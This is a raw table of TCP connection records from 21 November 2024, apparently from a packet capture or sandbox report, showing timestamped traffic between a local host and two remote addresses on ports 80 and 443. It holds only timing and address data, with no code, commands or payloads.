                                                                                                                                                                              Nov 21, 2024 08:30:39.132204056 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.132628918 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.132714033 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.133419991 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.133492947 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.133554935 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.133596897 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.134246111 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.134428978 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.134521008 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.135023117 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.146100044 CET4434977040.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.146188021 CET4434977040.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.146749973 CET49770443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:30:39.158423901 CET49770443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:30:39.158452988 CET4434977040.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.158473969 CET49770443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:30:39.185257912 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.240293980 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.240895033 CET49771443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:39.240921021 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.241368055 CET49771443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:39.241374016 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.253463984 CET4434977313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.253933907 CET49773443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:39.253961086 CET4434977313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.254404068 CET49773443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:39.254409075 CET4434977313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.293569088 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.293673992 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.293730021 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.293978930 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.294112921 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.294296980 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.294790030 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.294923067 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.295129061 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.295624018 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.295747042 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.295929909 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.296441078 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.296498060 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.296618938 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.297272921 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.297395945 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.297451019 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.298083067 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.298187971 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.298316002 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.298887968 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.299004078 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.299127102 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.299721956 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.299819946 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.300465107 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.300548077 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.300582886 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.300633907 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.301369905 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.301438093 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.301678896 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.302164078 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.302275896 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.302335978 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.303004026 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.303112030 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.303289890 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.303813934 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.303924084 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.303976059 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.304668903 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.304802895 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.304925919 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.305417061 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.307405949 CET4434977213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.307879925 CET49772443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:39.307893991 CET4434977213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.308339119 CET49772443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:39.308346987 CET4434977213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.357151985 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.688941002 CET4434977313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.689014912 CET4434977313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.689085007 CET49773443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:39.689666986 CET49773443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:39.689685106 CET4434977313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.695699930 CET49776443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:39.695743084 CET4434977613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.695817947 CET49776443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:39.696829081 CET49776443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:39.696841002 CET4434977613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.700732946 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.700790882 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.700905085 CET49771443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:39.702599049 CET49771443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:39.702620029 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.702634096 CET49771443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:39.702639103 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.705054998 CET49777443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:39.705085039 CET4434977713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.705185890 CET49777443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:39.705476999 CET49777443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:39.705488920 CET4434977713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.751741886 CET4434977213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.751828909 CET4434977213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.753192902 CET49772443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:39.753281116 CET49772443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:39.753300905 CET4434977213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.753319979 CET49772443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:39.753325939 CET4434977213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.755819082 CET49778443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:39.755860090 CET4434977813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.755940914 CET49778443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:39.756288052 CET49778443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:39.756294012 CET4434977813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:40.169728041 CET4434977413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:40.170370102 CET49774443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:40.170389891 CET4434977413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:40.170829058 CET49774443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:40.170834064 CET4434977413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:40.468111992 CET4434977513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:40.513379097 CET49775443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:40.580487967 CET49775443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:40.580501080 CET4434977513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:40.583297014 CET49775443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:40.583302021 CET4434977513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:40.615382910 CET4434977413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:40.615462065 CET4434977413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:40.615525961 CET49774443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:40.643762112 CET49774443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:40.643784046 CET4434977413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:40.662513018 CET49779443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:40.662540913 CET4434977913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:40.662604094 CET49779443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:40.663113117 CET49779443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:40.663132906 CET4434977913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:40.911673069 CET4434977513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:40.911875010 CET4434977513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:40.911952972 CET49775443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:40.918304920 CET49775443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:40.918304920 CET49775443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:40.918324947 CET4434977513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:40.918334007 CET4434977513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:40.966356039 CET49780443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:40.966386080 CET4434978013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:40.966492891 CET49780443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:40.970967054 CET49780443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:40.970982075 CET4434978013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:41.477288008 CET4434977613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:41.477787018 CET49776443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:41.477813005 CET4434977613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:41.478261948 CET49776443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:41.478271961 CET4434977613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:41.489662886 CET4434977713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:41.490102053 CET49777443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:41.490128994 CET4434977713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:41.490550041 CET49777443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:41.490555048 CET4434977713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:41.547108889 CET4434977813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:41.547636986 CET49778443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:41.547669888 CET4434977813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:41.548171043 CET49778443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:41.548177004 CET4434977813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:41.922455072 CET4434977613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:41.922524929 CET4434977613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:41.922611952 CET49776443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:41.922751904 CET49776443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:41.922770977 CET4434977613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:41.922782898 CET49776443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:41.922789097 CET4434977613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:41.925576925 CET49781443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:41.925610065 CET4434978113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:41.925899982 CET49781443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:41.926084995 CET49781443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:41.926099062 CET4434978113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:41.959686041 CET4434977713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:41.959753036 CET4434977713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:41.959884882 CET49777443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:41.959974051 CET49777443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:41.959990025 CET4434977713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:41.960022926 CET49777443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:41.960030079 CET4434977713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:41.962698936 CET49782443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:41.962747097 CET4434978213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:41.963021994 CET49782443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:41.963176012 CET49782443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:41.963192940 CET4434978213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:41.989988089 CET4434977813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:41.990056038 CET4434977813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:41.990185976 CET49778443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:41.990211010 CET49778443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:41.990222931 CET4434977813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:41.990231037 CET49778443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:41.990236044 CET4434977813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:41.992317915 CET49783443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:41.992336988 CET4434978313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:41.992405891 CET49783443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:41.992521048 CET49783443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:41.992535114 CET4434978313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:42.446753025 CET4434977913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:42.447259903 CET49779443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:42.447273016 CET4434977913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:42.447855949 CET49779443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:42.447860003 CET4434977913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:42.768810987 CET4434978013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:42.769323111 CET49780443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:42.769361019 CET4434978013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:42.769854069 CET49780443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:42.769861937 CET4434978013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:42.915297031 CET4434977913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:42.915384054 CET4434977913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:42.919418097 CET49779443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:42.919498920 CET49779443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:42.919498920 CET49779443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:42.919513941 CET4434977913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:42.919523954 CET4434977913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:42.922050953 CET49784443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:42.922094107 CET4434978413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:42.922172070 CET49784443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:42.922334909 CET49784443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:42.922348022 CET4434978413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:43.233102083 CET4434978013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:43.233176947 CET4434978013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:43.233268023 CET49780443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:43.234868050 CET49780443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:43.234888077 CET4434978013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:43.234903097 CET49780443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:43.234910011 CET4434978013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:43.238192081 CET49785443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:43.238225937 CET4434978513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:43.238301992 CET49785443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:43.238516092 CET49785443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:43.238528967 CET4434978513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:43.704032898 CET4434978113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:43.763365984 CET49781443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:43.831897974 CET4434978213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:43.845035076 CET4434978313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:43.872735977 CET49782443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:43.888365030 CET49783443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:43.953969955 CET49783443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:43.953979015 CET4434978313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:43.954616070 CET49783443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:43.954618931 CET4434978313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:43.955008030 CET49781443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:43.955019951 CET4434978113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:43.955456018 CET49781443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:43.955460072 CET4434978113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:43.955585957 CET49782443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:43.955617905 CET4434978213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:43.956018925 CET49782443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:43.956027031 CET4434978213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:44.281024933 CET4434978113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:44.281100988 CET4434978113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:44.281176090 CET49781443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:44.281413078 CET49781443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:44.281438112 CET4434978113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:44.281455994 CET49781443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:44.281462908 CET4434978113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:44.285768032 CET49786443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:44.285813093 CET4434978613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:44.285881996 CET49786443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:44.286104918 CET49786443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:44.286118031 CET4434978613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:44.298479080 CET4434978313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:44.298544884 CET4434978313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:44.298599958 CET49783443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:44.298755884 CET49783443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:44.298772097 CET4434978313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:44.298814058 CET49783443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:44.298821926 CET4434978313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:44.301908016 CET49787443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:44.301939964 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:44.302002907 CET49787443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:44.302194118 CET49787443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:44.302207947 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:44.340600014 CET4434978213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:44.340679884 CET4434978213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:44.340732098 CET49782443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:44.340882063 CET49782443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:44.340902090 CET4434978213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:44.340933084 CET49782443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:44.340939999 CET4434978213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:44.347711086 CET49788443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:44.347740889 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:44.347796917 CET49788443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:44.347933054 CET49788443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:44.347939968 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:44.799137115 CET4434978413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:44.841490984 CET49784443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:44.872682095 CET49784443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:44.872694969 CET4434978413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:44.873533010 CET49784443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:44.873538017 CET4434978413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:45.087222099 CET4434978513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:45.138384104 CET49785443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:45.241427898 CET49785443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:45.241441011 CET4434978513.107.246.45192.168.2.6
